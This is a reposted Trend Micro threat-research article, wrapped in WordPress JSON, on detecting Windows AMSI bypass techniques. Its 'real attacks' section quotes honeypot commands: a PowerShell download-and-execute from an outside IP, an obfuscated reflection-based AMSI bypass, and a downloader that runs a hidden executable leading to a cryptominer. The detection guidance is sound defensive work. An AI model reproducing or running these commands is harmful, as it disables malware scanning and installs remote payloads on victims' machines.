{"id":49830,"date":"2022-12-21T00:00:00","date_gmt":"2022-12-21T00:00:00","guid":{"rendered":"urn:uuid:428d8e17-4917-393c-babe-bab969d62e3a"},"modified":"2022-12-21T00:00:00","modified_gmt":"2022-12-21T00:00:00","slug":"detecting-windows-amsi-bypass-techniques","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/","title":{"rendered":"Detecting Windows AMSI Bypass Techniques"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/cover-detecting-amsi-bypass-techniques-trend-micro-vision-one-apex-one.jpg\"><\/p>\n<p>Techniques bypassing AMSI were primarily used by security researchers and penetration testers. In recent years, however, <a href=\"https:\/\/twitter.com\/trendmicrorsrch\/status\/959426180851134466\">cybercriminals<\/a> <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/e\/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html\">have<\/a> <a href=\"https:\/\/news.sophos.com\/en-us\/2021\/02\/02\/agent-tesla-amps-up-information-stealing-attacks\/\">abused<\/a> <a href=\"https:\/\/www.trendmicro.com\/vinfo\/gb\/threat-encyclopedia\/malware\/Trojan.PS1.POWTRAN.B\/\">this<\/a> and included the method as a feature in malware routines to evade detection, allowing them to operate continuously on a victim&#8217;s computer. Prior to AMSI, detection of fileless threats proved difficult. 
Previously documented methods used to achieve an AMSI bypass were:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Obfuscation and\/or encryption<\/span><\/li>\n<li><span class=\"rte-red-bullet\">PowerShell downgrade<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Hooks and unhooks<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Memory patching<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Forcing an error<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Registry modifications<\/span><\/li>\n<li><span class=\"rte-red-bullet\">DLL hijacking<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Reflection<\/span><\/li>\n<\/ul>\n<p>The whole topic of bypassing AMSI is complex, but the goal is to break the AMSI \u201cchain\u201d at some point. The AMSI chain\u2019s basic blocks are primarily three components: the data provider, <i>amsi.dll<\/i>, and the AMSI provider. Based on the list of methods for bypassing AMSI, we can see that the difficulty of detection varies and depends on the capabilities available in a machine.<\/p>\n<p><span class=\"main-subtitle-black\">Manually finding an AMSI bypass<\/span><\/p>\n<p>Analysts can look for processes bypassing AMSI in and via the following areas:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Registry<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\<br \/>*\\Microsoft\\Windows Script\\Settings\\AmsiEnable<br \/>COM Hijacking<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li><span class=\"rte-red-bullet\">Code execution (such as patterns, file names, and function names, among others)<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">PowerShell 2.0<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">AmsiInitialize + VirtualProtect<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">GetProcAddress + VirtualProtect<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">LoadLibrary + any AMSI or related DLL<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span 
class=\"rte-red-bullet\">Memory<\/span><\/li>\n<li><span class=\"rte-red-bullet\">AMSI and related DLLs (DLL hijacking via <i>amsi.dll<\/i>)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Various hooks<\/span><\/li>\n<\/ul>\n<p><span class=\"main-subtitle-black\">AMSI bypass in real attacks<\/span><\/p>\n<p>Observing AMSI bypass in real attacks, we also found them as payloads, process injections, and miner configurations that can vary based on the time of deployment and targets. The following is an example of how it was used for a compromise from one of our cloud honeypots:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><\/span>After the initial access, a PowerShell script is executed<\/li>\n<\/ul>\n<p><span class=\"blockquote\">powershell&nbsp;&#8220;IEX(New-Object Net.WebClient).DownloadString(&#8216;<a href=\"http:\/\/89.34.27.167\/lol.ps1')\">hxxp:\/\/89.34.27.167\/lol.ps1&#8242;)<\/a>&#8220;<\/span><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><\/span>AMSI bypass<\/li>\n<\/ul>\n<p><span class=\"blockquote\">[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType((&#8220;{5}{2}{0}{1}{3}{6}{4}&#8221; -f &#8216;ut&#8217;,(&#8216;oma&#8217;+&#8217;t&#8217;+&#8217;ion.&#8217;),&#8217;.A&#8217;,(&#8216;Ams&#8217;+&#8217;iUt&#8217;),&#8217;ls&#8217;,(&#8216;S&#8217;+&#8217;ystem.&#8217;+&#8217;Manage&#8217;+&#8217;men&#8217;+&#8217;t&#8217;),&#8217;i&#8217;)).GetField((&#8220;{1}{2}{0}&#8221; -f (&#8216;Co&#8217;+&#8217;n&#8217;+&#8217;text&#8217;),(&#8216;am&#8217;+&#8217;s&#8217;),&#8217;i&#8217;),[Reflection.BindingFlags](&#8220;{4}{2}{3}{0}{1}&#8221; -f(&#8216;b&#8217;+&#8217;lic,Sta&#8217;+&#8217;ti&#8217;),&#8217;c&#8217;,&#8217;P&#8217;,&#8217;u&#8217;,(&#8216;N&#8217;+&#8217;on&#8217;))).GetValue($null),0x41414141)<\/span><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><\/span>Downloader execution based on system architecture<\/li>\n<\/ul>\n<p><span class=\"blockquote\">$cc = &#8220;http[:]\/\/89.34.27.167&#8221;<br \/>$is64 = 
(([Array](Get-WmiObject -Query &#8220;select AddressWidth from Win32_Processor&#8221;))[0].AddressWidth -eq 64)<br \/>$dst=&#8221;$env:TMP\\networkservicess.exe&#8221;<br \/>(New-Object Net.WebClient).DownloadFile(&#8220;$cc\/ps1-6.exe&#8221;, &#8220;$dst&#8221;)<br \/>Start-Process &#8220;$dst&#8221;&nbsp; -windowstyle hidden<\/span><br \/><i><\/i><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><\/span>Additional payloads are loaded into memory using <i>ps1-6[.]exe<\/i>.<\/li>\n<li><span class=\"rte-red-bullet\">The process\u2019 payloads transform into injectors that perform process hollowing on the&nbsp; <i>InstallUtil.exe<\/i> process.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">This ends with a complete payload download of an XMRig cryptocurrency miner deployment and setup.<\/span><\/li>\n<\/ul>\n<p><span class=\"main-subtitle-black\">Detecting AMSI bypass using Trend Micro Vision One\u2122<\/span><\/p>\n<p>We looked at some of the implementations of AMSI bypass and the visibility enabled by <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\" target=\"_blank\" rel=\"noopener\">Trend Micro Vision One\u2122<\/a>, <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/hybrid-cloud\/cloud-one-workload-security.html\" target=\"_blank\" rel=\"noopener\">Trend Micro Cloud One\u2122- Workload Security<\/a>, and <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/endpoint.html\" target=\"_blank\" rel=\"noopener\">Trend Micro Apex One\u2122<\/a> to mitigate the risks brought on by the known and unknown methods to circumvent this security feature. 
Using the indicators and attributes of attempts logged from workloads and endpoints, these solutions and platforms give security teams and analysts a wider view of attack attempts for immediate and actionable response.<\/p>\n<p>As a tool used to accompany other components and processes, the Observed Attack Techniques (OATs) for select AMSI bypasses flag the occurrences as suspicious and warranting investigation. The OAT results for bypasses are categorized as \u201cHigh Severity,\u201d and the endpoint is immediately checked for related components and events as part of the evidence for analysis.<\/p>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/l\/detecting-windows-amsi-bypass-techniques.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We look into some of the implementations that cybercriminals use to bypass the Windows Antimalware Scan Interface (AMSI) and how security teams can detect threats attempting to abuse it for compromise with Trend Micro Vision One\u2122. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":49831,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9521,9511,9508,9555,9513],"class_list":["post-49830","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-crime","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-endpoints","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-malware"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Detecting Windows AMSI Bypass Techniques 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Detecting Windows AMSI Bypass Techniques 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-12-21T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/cover-detecting-amsi-bypass-techniques-trend-micro-vision-one-apex-one.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Detecting Windows AMSI Bypass 
Techniques\",\"datePublished\":\"2022-12-21T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/\"},\"wordCount\":562,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/detecting-windows-amsi-bypass-techniques.jpg\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Crime\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : Malware\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/\",\"name\":\"Detecting Windows AMSI Bypass Techniques 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/detecting-windows-amsi-bypass-techniques.jpg\",\"datePublished\":\"2022-12-21T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/detecting-windows-amsi-bypass-techniques.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/detecting-windows-amsi-bypass-techniques.jpg\",\"width\":641,\"height\":350},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Detecting Windows AMSI Bypass Techniques\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 
IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH 
Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Detecting Windows AMSI Bypass Techniques 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/","og_locale":"en_US","og_type":"article","og_title":"Detecting Windows AMSI Bypass Techniques 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-12-21T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/cover-detecting-amsi-bypass-techniques-trend-micro-vision-one-apex-one.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. 
reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Detecting Windows AMSI Bypass Techniques","datePublished":"2022-12-21T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/"},"wordCount":562,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/detecting-windows-amsi-bypass-techniques.jpg","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Crime","Trend Micro Research : Cyber Threats","Trend Micro Research : Endpoints","Trend Micro Research : Exploits&amp;Vulnerabilities","Trend Micro Research : Malware"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/","url":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/","name":"Detecting Windows AMSI Bypass Techniques 2026 | ThreatsHub Cybersecurity 
News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/detecting-windows-amsi-bypass-techniques.jpg","datePublished":"2022-12-21T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/detecting-windows-amsi-bypass-techniques.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/detecting-windows-amsi-bypass-techniques.jpg","width":641,"height":350},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Detecting Windows AMSI Bypass Techniques"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity 
News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH 
Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/49830","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=49830"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/49830\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/49831"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=49830"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=49830"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=49830"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}